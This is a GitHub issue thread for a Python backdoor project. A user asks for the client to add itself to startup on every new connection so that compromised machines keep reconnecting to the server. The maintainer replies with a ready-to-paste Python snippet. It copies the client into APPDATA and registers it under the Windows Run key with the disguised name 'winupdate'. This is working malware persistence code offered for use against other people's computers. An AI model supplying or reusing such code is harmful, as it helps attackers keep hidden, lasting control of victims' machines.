### ISSUE TITLE
[Request] for automatic run at startup (--a)

### ISSUE THREAD

**Issue by ToastiiOfficial** [xp4xbox/Python-Backdoor#14]
It would be really good if there was an option to run the --a command (run at startup) whenever a new connection was established. This would be good because users could leave the server script running for a long time and it would automatically add the client file to startup so when the user comes back to the server they can access all of the connected IP addresses and if some have disconnected, then they will reconnect at the next boot. I have been trying to make this myself but I do not know much python. Thanks.

**Comment by xp4xbox** [comment]
It is really super easy to do on your own, just copy this code

```
strAppPath = APPDATA + "\\" + os.path.basename(strPath)
        copyfile(strPath, strAppPath)

        objRegKey = OpenKey(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", 0, KEY_ALL_ACCESS)
SetValueEx(objRegKey, "winupdate", 0, REG_SZ, strAppPath); CloseKey(objRegKey)
```

and put it after the import statements. Anybody who knows even a little bit about programming can easily figure this out.
